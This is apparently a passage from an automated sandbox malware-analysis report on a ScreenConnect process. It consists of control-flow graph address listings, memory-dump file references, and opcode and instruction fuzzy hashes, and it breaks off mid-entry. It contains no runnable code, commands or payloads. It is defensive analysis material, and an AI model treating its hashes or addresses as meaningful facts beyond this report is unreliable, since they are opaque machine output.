                                                                  control_flow_graph 533 7ffb4acf0247-7ffb4acf0287 538 7ffb4acf028c-7ffb4acf0299 533->538 540 7ffb4acf029b-7ffb4acf048e 538->540 576 7ffb4acf04d8-7ffb4acf0500 540->576 577 7ffb4acf0490-7ffb4acf04c6 540->577 582 7ffb4acf0524-7ffb4acf053c 576->582 583 7ffb4acf0502-7ffb4acf0521 576->583 588 7ffb4acf0560-7ffb4acf057e 582->588 589 7ffb4acf053e-7ffb4acf055d 582->589 583->582 592 7ffb4acf059a 588->592 593 7ffb4acf0580-7ffb4acf0590 588->593 589->588 595 7ffb4acf059f-7ffb4acf05a5 592->595 596 7ffb4acf0597-7ffb4acf0598 593->596 597 7ffb4acf063e-7ffb4acf0641 595->597 598 7ffb4acf05ab-7ffb4acf05b4 595->598 596->592 601 7ffb4acf0698-7ffb4acf06b6 597->601 602 7ffb4acf0643-7ffb4acf066e 597->602 599 7ffb4acf05b6-7ffb4acf05c3 598->599 600 7ffb4acf05cd-7ffb4acf05d8 598->600 599->600 608 7ffb4acf05c5-7ffb4acf05cb 599->608 604 7ffb4acf05da-7ffb4acf05f7 600->604 605 7ffb4acf0624-7ffb4acf063c 600->605 619 7ffb4acf06ba-7ffb4acf06c6 601->619 620 7ffb4acf0800-7ffb4acf081e 601->620 621 7ffb4acf06df-7ffb4acf06ea 602->621 622 7ffb4acf0670-7ffb4acf0672 602->622 611 7ffb4acf08e2-7ffb4acf093f 604->611 612 7ffb4acf05fd-7ffb4acf0622 604->612 605->597 608->600 656 7ffb4acf0941-7ffb4acf094a 611->656 657 7ffb4acf094b-7ffb4acf0952 611->657 612->605 626 7ffb4acf06c8-7ffb4acf06ca 619->626 627 7ffb4acf06cc-7ffb4acf06da call 7ffb4acf0078 619->627 651 7ffb4acf0824-7ffb4acf082e 620->651 652 7ffb4acf08bd-7ffb4acf08df 620->652 624 7ffb4acf06eb-7ffb4acf06ec 621->624 628 7ffb4acf0674 622->628 629 7ffb4acf06ee-7ffb4acf06fa 622->629 624->629 635 7ffb4acf06dd-7ffb4acf06de 626->635 627->635 628->619 630 7ffb4acf0676-7ffb4acf067a 628->630 631 7ffb4acf0700-7ffb4acf0701 629->631 632 7ffb4acf06fc-7ffb4acf06fe 629->632 630->624 637 7ffb4acf067c-7ffb4acf0681 630->637 640 7ffb4acf0702-7ffb4acf070e call 7ffb4acf0078 631->640 639 7ffb4acf0711-7ffb4acf0715 632->639 635->621 637->640 642 7ffb4acf0683-7ffb4acf068e 637->642 644 7ffb4acf0716-7ffb4acf072e 639->644 640->639 647 7ffb4acf06ff 642->647 648 7ffb4acf0690-7ffb4acf0695 642->648 662 7ffb4acf0734-7ffb4acf0742 call 7ffb4acf0078 644->662 663 7ffb4acf0730-7ffb4acf0732 644->663 647->631 648->644 653 7ffb4acf0697 648->653 658 7ffb4acf0834-7ffb4acf0842 call 7ffb4acf0078 651->658 659 7ffb4acf0830-7ffb4acf0832 651->659 652->611 653->601 664 7ffb4acf0954-7ffb4acf095d 657->664 665 7ffb4acf095e-7ffb4acf0969 657->665 660 7ffb4acf0845-7ffb4acf0862 658->660 659->660 673 7ffb4acf0868-7ffb4acf0876 call 7ffb4acf0078 660->673 674 7ffb4acf0864-7ffb4acf0866 660->674 669 7ffb4acf0745-7ffb4acf0762 662->669 663->669 675 7ffb4acf0768-7ffb4acf0776 call 7ffb4acf0078 669->675 676 7ffb4acf0764-7ffb4acf0766 669->676 677 7ffb4acf0879-7ffb4acf0896 673->677 674->677 679 7ffb4acf0779-7ffb4acf078f 675->679 676->679 685 7ffb4acf0898-7ffb4acf089a 677->685 686 7ffb4acf089c-7ffb4acf08aa call 7ffb4acf0078 677->686 687 7ffb4acf07a6-7ffb4acf07ad 679->687 688 7ffb4acf0791-7ffb4acf07a4 call 7ffb4acf0078 679->688 689 7ffb4acf08ad-7ffb4acf08b6 685->689 686->689 693 7ffb4acf07b4-7ffb4acf07c7 687->693 688->687 695 7ffb4acf07cd-7ffb4acf07d0 688->695 689->652 693->695 696 7ffb4acf07e7-7ffb4acf07fa 695->696 697 7ffb4acf07d2-7ffb4acf07e5 call 7ffb4acf0078 695->697 696->620 697->620 697->696
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03c278bcd8662be3841bfacba2d565b63dbe5ab632156ec34edcf92a4aed8aef
                                                                  • Instruction ID: 7d039e9603133e3d156e582ed75a47f11dfb5f76169feed6aca4060a779732a4
                                                                  • Opcode Fuzzy Hash: 03c278bcd8662be3841bfacba2d565b63dbe5ab632156ec34edcf92a4aed8aef
                                                                  • Instruction Fuzzy Hash: 513235A2A0DA864FF795EE7CCC556B43BD4EF95710B2800FAE58DCB5C3EC19A8468340

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1122 7ffb4acf4e25-7ffb4acf4e31 1123 7ffb4acf4e35-7ffb4acf4e51 1122->1123 1124 7ffb4acf4e33 1122->1124 1131 7ffb4acf4e58-7ffb4acf4e5a 1123->1131 1124->1123 1125 7ffb4acf4e75-7ffb4acf4e7b 1124->1125 1127 7ffb4acf4e94-7ffb4acf4ea9 1125->1127 1128 7ffb4acf4e7d-7ffb4acf4e92 1125->1128 1132 7ffb4acf4ef3-7ffb4acf4f32 1127->1132 1133 7ffb4acf4eab-7ffb4acf4ed9 1127->1133 1128->1127 1134 7ffb4acf4ee9-7ffb4acf4ef2 1131->1134 1135 7ffb4acf4e60-7ffb4acf4e70 1131->1135 1142 7ffb4acf4f34-7ffb4acf4f4b 1132->1142 1143 7ffb4acf4f7c-7ffb4acf4f7f 1132->1143 1135->1125 1151 7ffb4acf5168-7ffb4acf517a 1142->1151 1152 7ffb4acf4f51-7ffb4acf4f57 1142->1152 1145 7ffb4acf4f81 1143->1145 1146 7ffb4acf4ffb 1143->1146 1148 7ffb4acf4fc7-7ffb4acf4fd4 1145->1148 1149 7ffb4acf4f83-7ffb4acf4f8b 1145->1149 1150 7ffb4acf4ffc-7ffb4acf5006 1146->1150 1153 7ffb4acf4fd7-7ffb4acf4fea 1148->1153 1149->1150 1154 7ffb4acf4f8d-7ffb4acf4f8f 1149->1154 1161 7ffb4acf5008-7ffb4acf5014 1150->1161 1152->1151 1155 7ffb4acf4f5d-7ffb4acf4f63 1152->1155 1164 7ffb4acf4fec-7ffb4acf4ffa 1153->1164 1157 7ffb4acf4f91 1154->1157 1158 7ffb4acf500b-7ffb4acf5014 1154->1158 1155->1151 1160 7ffb4acf4f69-7ffb4acf4f6f 1155->1160 1157->1153 1162 7ffb4acf4f93-7ffb4acf4f97 1157->1162 1163 7ffb4acf5016-7ffb4acf501a 1158->1163 1160->1151 1165 7ffb4acf4f75-7ffb4acf4f7b 1160->1165 1161->1163 1162->1161 1167 7ffb4acf4f99-7ffb4acf4f9e 1162->1167 1168 7ffb4acf501f-7ffb4acf5034 1163->1168 1164->1150 1165->1164 1166 7ffb4acf4f7d-7ffb4acf4f7f 1165->1166 1166->1145 1166->1146 1167->1168 1170 7ffb4acf4fa0-7ffb4acf4fa5 1167->1170 1175 7ffb4acf503b-7ffb4acf5048 1168->1175 1170->1163 1171 7ffb4acf4fa7-7ffb4acf4fac 1170->1171 1173 7ffb4acf502d-7ffb4acf5035 1171->1173 1174 7ffb4acf4fae-7ffb4acf4fc2 1171->1174 1173->1175 1174->1151 1177 7ffb4acf4fc8-7ffb4acf4fd4 1174->1177 1175->1151 1179 7ffb4acf504e-7ffb4acf5054 1175->1179 1177->1153 1179->1151 1180 7ffb4acf505a-7ffb4acf5060 1179->1180 1180->1151 1181 7ffb4acf5066-7ffb4acf506c 1180->1181 1181->1151 1182 7ffb4acf5072-7ffb4acf50f2 1181->1182 1182->1151 1190 7ffb4acf50f4-7ffb4acf5109 call 7ffb4acf1860 1182->1190 1193 7ffb4acf510e-7ffb4acf5110 1190->1193 1193->1151 1194 7ffb4acf5112-7ffb4acf512e call 7ffb4acf1860 1193->1194 1194->1151 1198 7ffb4acf5130-7ffb4acf5138 1194->1198 1198->1151 1199 7ffb4acf513a-7ffb4acf5167 call 7ffb4acf1860 1198->1199
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a727ee2d04795fe4ab9e2276222aa451ae355ec44af2f60b78575d766fb1d9ee
                                                                  • Instruction ID: 240b9329a1c9acbfed1be5cb9aeb06de24d5870709f09cc60ddedb63a2a2c194
                                                                  • Opcode Fuzzy Hash: a727ee2d04795fe4ab9e2276222aa451ae355ec44af2f60b78575d766fb1d9ee
                                                                  • Instruction Fuzzy Hash: B9C1E9B290CA4B1BEB95EE38C9428F577D1EF54710B2441B9E58E879C3ED18F80A87C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ec1c50bbe174afbecb501b3d1f2846c807aefca1b6b0cf0990122c83519ea92
                                                                  • Instruction ID: 531b195b8eeaf8d027ace84367e868f6a990aaf3c9261bd2eb1d1e9d8f25793b
                                                                  • Opcode Fuzzy Hash: 9ec1c50bbe174afbecb501b3d1f2846c807aefca1b6b0cf0990122c83519ea92
                                                                  • Instruction Fuzzy Hash: 0E91FCDB90F6D61BE652EFBCDDA64E57F64EF9222071800F3F2C98A4D3AC0518498391
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97040aaeb6e903383ce188dc1607f9d4d5b03ac3dad61ebe9fc42ad6a4db3005
                                                                  • Instruction ID: e4ef8b8952393e8090aa8d8944e1db4dfb62195333b909e7f66ed578acf8435b
                                                                  • Opcode Fuzzy Hash: 97040aaeb6e903383ce188dc1607f9d4d5b03ac3dad61ebe9fc42ad6a4db3005
                                                                  • Instruction Fuzzy Hash: F691B5B260DA8A4FEBC9EF28CC51AA577D1FF54714B1401E9E44ECB5C3DE25E8068780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 064bf3b4f883d577ae2acabf687c5d1547d25d4e79e961ef839d19641d04d0fe
                                                                  • Instruction ID: d4c1ff098a5016e149f47d0b6712d9c76d9a3ffc3d39470514aefee8d874a2d6
                                                                  • Opcode Fuzzy Hash: 064bf3b4f883d577ae2acabf687c5d1547d25d4e79e961ef839d19641d04d0fe
                                                                  • Instruction Fuzzy Hash: 2181867290C90A5BDF99EE24C9828F573E5FF54700B6441A9E54E839C3EE28F906C7C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 433a3b2e771a7efad0a49bca36aa0b0be95f82f1f42b3616940f1b7030e2891b
                                                                  • Instruction ID: 5fcfd12fbfea370b39d94e0041dad009dbe548a66c0789a082bbb7d67cdda0f7
                                                                  • Opcode Fuzzy Hash: 433a3b2e771a7efad0a49bca36aa0b0be95f82f1f42b3616940f1b7030e2891b
                                                                  • Instruction Fuzzy Hash: D27105E294EACB0FE796EF78DC551A17BA1EF96600B2841FAE089C75C3DD196C06C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a53a0b3816ee3efc4e9b8a7fb50adf852ae39a927e51d1bf352e334540bfaba5
                                                                  • Instruction ID: ae4175b7789216783ea7ca3e9465ddfc64066d46c9735badf2df4f2890ed7e1e
                                                                  • Opcode Fuzzy Hash: a53a0b3816ee3efc4e9b8a7fb50adf852ae39a927e51d1bf352e334540bfaba5
                                                                  • Instruction Fuzzy Hash: 01510BB2A0DE4A4BEB95EF78EC511E97BE5FFA5310B1401B9E04DC39D3DE24A8058380
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0dd290fc79f0a4864b4d8e39f7cfec735bddc5bbc0218300b03557428b09cb12
                                                                  • Instruction ID: a0a0b8745e6e63697d6da9b5c7385869997eaf9115388c878d818ee8dcf454f1
                                                                  • Opcode Fuzzy Hash: 0dd290fc79f0a4864b4d8e39f7cfec735bddc5bbc0218300b03557428b09cb12
                                                                  • Instruction Fuzzy Hash: 2B6187A1A0D59B0BE78AFE7CD8916F83B94DF59704F2841F9E48DCA4C3DD1DA80A8345
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3f92aa5f3863b2f53a2701bdedafe70f42157570d2265f74b781ba83b406a7be
                                                                  • Instruction ID: fb8693341371a5b351e6e9f7cd88225fe7f2d46d38eeef355da47a4b137be119
                                                                  • Opcode Fuzzy Hash: 3f92aa5f3863b2f53a2701bdedafe70f42157570d2265f74b781ba83b406a7be
                                                                  • Instruction Fuzzy Hash: 2551617570CA4A8FDFC8EF28C894AA537A1FF59314B2401A9E41DCB6D2CB35E842CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a18b0027b4623a4a2cf482886caf0ab1a365085df5f8a277a168eac745980ec
                                                                  • Instruction ID: f96ad104fb2228f477f500d7d857cacc7d2964f3cc7bb37f6fa48336f0371841
                                                                  • Opcode Fuzzy Hash: 3a18b0027b4623a4a2cf482886caf0ab1a365085df5f8a277a168eac745980ec
                                                                  • Instruction Fuzzy Hash: 4A5173B160CA8E4FEBC8DF28CCA09A53BE0FF59314F2405A9E55EC76D3DA259816C744
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4cff51ecf94a5bddba19c97761e53d76def852f4858ffd0ddd13b1da9d749f7
                                                                  • Instruction ID: d031e6a801e9e1af0d99f15c32082bc7ec4f65aaf752125735947d13ebd4aba1
                                                                  • Opcode Fuzzy Hash: a4cff51ecf94a5bddba19c97761e53d76def852f4858ffd0ddd13b1da9d749f7
                                                                  • Instruction Fuzzy Hash: 4D5102A1A1CACA4BD799FF38C8916A537C0FF58708B2441FDE44EC75C7DE28A8098280
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d586171f3852fd2d0ce2688fb87813a5141a27f203a8849404c25637b4ccc459
                                                                  • Instruction ID: c45710cbadad93fab2e50829186b05ee7c8e4ece15bef05b613aa94cfb3cd251
                                                                  • Opcode Fuzzy Hash: d586171f3852fd2d0ce2688fb87813a5141a27f203a8849404c25637b4ccc459
                                                                  • Instruction Fuzzy Hash: 8F41DBA790E5925FD742EF7CEC914E57FA0EF9322470901F7E1C89B0D3ED0528498691
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05b64961fc89915c162696bb6fb9c3e950b3148a1c40791fa4a2416430e9a02b
                                                                  • Instruction ID: 0e9c823e006eda78c4e3920ba497b5eb28e75f4f63171a2d0dce68f3afe8fa6d
                                                                  • Opcode Fuzzy Hash: 05b64961fc89915c162696bb6fb9c3e950b3148a1c40791fa4a2416430e9a02b
                                                                  • Instruction Fuzzy Hash: 3F319FB160DA879FD399EF74C854AA57BE1FF58304B1405F9E45ECB6D3CA28A805C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8502e6e4683997f9f5f8b3a035650c7cc5a91f9a53262a621515d3975d588376
                                                                  • Instruction ID: 0da1e877507c495cda38793b4631062c2961886f6ece5ca9b06d1b7c49577456
                                                                  • Opcode Fuzzy Hash: 8502e6e4683997f9f5f8b3a035650c7cc5a91f9a53262a621515d3975d588376
                                                                  • Instruction Fuzzy Hash: 3A21A2B2A58E4B0BD6D6EF78C8856A17391FFA470476445B9D45DC75C7CE18AC058340
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f2e6d547bd4cec32beb58e08e6cd1689a31e9e0ee132b313cbd137aae112d947
                                                                  • Instruction ID: f4b8472ff32fe7c474d99bfada89c79f6f5f6a5ad9c0860142c4ee141fdd68c3
                                                                  • Opcode Fuzzy Hash: f2e6d547bd4cec32beb58e08e6cd1689a31e9e0ee132b313cbd137aae112d947
                                                                  • Instruction Fuzzy Hash: 9C213BB160CA479FD799EF38C890AA577D1FF98304B2405B9E45ECB6D3CA29A805C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f6c30f87fe4e001d9d6d92a623ba7c5cbac391d2982ee4663a512c22c7622de
                                                                  • Instruction ID: 4b3a86915dce04a768504b065dd305da5d5d0b1e451261f9ff10ce06e0a6ba0c
                                                                  • Opcode Fuzzy Hash: 2f6c30f87fe4e001d9d6d92a623ba7c5cbac391d2982ee4663a512c22c7622de
                                                                  • Instruction Fuzzy Hash: 911193B2E0CA4D4BEFD5EFA89C510A93FA0EF59304F1540EAE548C3693DA65A904CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 736f741a2c1cb19873d777e960fd041877f579840786e884216c7656c66a7f6a
                                                                  • Instruction ID: 0632211a0ddd51f658f8fcd73a2404081a4069b0dbd53d53d32125b8da09f1ed
                                                                  • Opcode Fuzzy Hash: 736f741a2c1cb19873d777e960fd041877f579840786e884216c7656c66a7f6a
                                                                  • Instruction Fuzzy Hash: B811026090DA970EF7A5EB38CA603756AE0EF45300F2840FAE45DC75D3DC1C9C818382
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac8a55cb8fe142dd877aa930fa32f63bac05277db73fa64e4c80ff0023f4f678
                                                                  • Instruction ID: 0724a41c285c889190849a0477a20b76ad45a550eaae77e6b0131c7f396ef2d1
                                                                  • Opcode Fuzzy Hash: ac8a55cb8fe142dd877aa930fa32f63bac05277db73fa64e4c80ff0023f4f678
                                                                  • Instruction Fuzzy Hash: 0F114CB560CA4A4FDBC9EF28C951BA577A1FF58304B2441E8D44DCB2C7CE28E845CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f470d8d8a30b90938b7f0bc65b565b0f8de91d84fc1b70d94b3e6570a985c19
                                                                  • Instruction ID: 706d58058f770703f5e1626926be42a9e36d5a7158deb48cf009b4fb54394bee
                                                                  • Opcode Fuzzy Hash: 7f470d8d8a30b90938b7f0bc65b565b0f8de91d84fc1b70d94b3e6570a985c19
                                                                  • Instruction Fuzzy Hash: 60112EB5618A4A4FDBC9EF28C955B557791FF58304B2441E8D44DCB2C7CE39E845CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 828641dd4f58999f9dccaeb9e3923b9bfafc5eae407979327084d6915cb3dc1f
                                                                  • Instruction ID: 229830c672d0e2d9b6a62ae12d78f21fda0a71538910ec40e76f543030866d3b
                                                                  • Opcode Fuzzy Hash: 828641dd4f58999f9dccaeb9e3923b9bfafc5eae407979327084d6915cb3dc1f
                                                                  • Instruction Fuzzy Hash: 9EF0A03540C68C5FCB42EF78E4518D57FB0EE1A310B0501C7E088CF093E6218A48CB82
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8fbd936ba9a240c1abdc174424d316589dc886e19499caf3425352e8131094f
                                                                  • Instruction ID: bd7081f4874549bc2ee09eb44b7fb66f3a44455bb4055adc78026d8560181cee
                                                                  • Opcode Fuzzy Hash: d8fbd936ba9a240c1abdc174424d316589dc886e19499caf3425352e8131094f
                                                                  • Instruction Fuzzy Hash: 21E0926150F7C50FD792AB3488688E07FA0AE1321030940EBD4818F4B3E5158A49C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c7320278cf82bee4d497ccb051533d767b39718319524307a66e9d8aef472cc
                                                                  • Instruction ID: 989580bfa9080a053e3d5ce037210441f7d134db953c606f3bd239bdd58199fc
                                                                  • Opcode Fuzzy Hash: 1c7320278cf82bee4d497ccb051533d767b39718319524307a66e9d8aef472cc
                                                                  • Instruction Fuzzy Hash: 84E08C5584E51702FAA8BA75EA513B560D89F04301F2500BEB42DC04C6DC0CDD808196
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce056ba18c3a4b52cb93493a4caa1c90175c782f175aad269c696e5b982c53c3
                                                                  • Instruction ID: fe2b594003c9d535aee810cb5f8c9ccda99cf55dce54c88e4212bd2265587d91
                                                                  • Opcode Fuzzy Hash: ce056ba18c3a4b52cb93493a4caa1c90175c782f175aad269c696e5b982c53c3
                                                                  • Instruction Fuzzy Hash: B4D05E82B4D83E0AA4C5FD6C78812F81686C7CC250B6400F2A44DC268ACC0D9C8303C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa68c30d386f5c542054f4711f102407e0caefc75c084c710b73164f24074ce6
                                                                  • Instruction ID: 79785c8dfe5f3a1070090d09f902843e5c637bc1dd4a14178f08f0e74ce0639c
                                                                  • Opcode Fuzzy Hash: fa68c30d386f5c542054f4711f102407e0caefc75c084c710b73164f24074ce6
                                                                  • Instruction Fuzzy Hash: 63C04C64A1C51656A184FF35C54527B11866F88200B704474E009C51C7CD28A9029101
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2761724559.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffb4acf0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e63a6547c89b4ee8d4dbcf77a72e51fbe7d5ce98faaf33c1cbed823803c4822
                                                                  • Instruction ID: 21ecdfca4a62d3a25e320e5258dbeb6c25606cb792d2a125a89bfa14856bbb9a
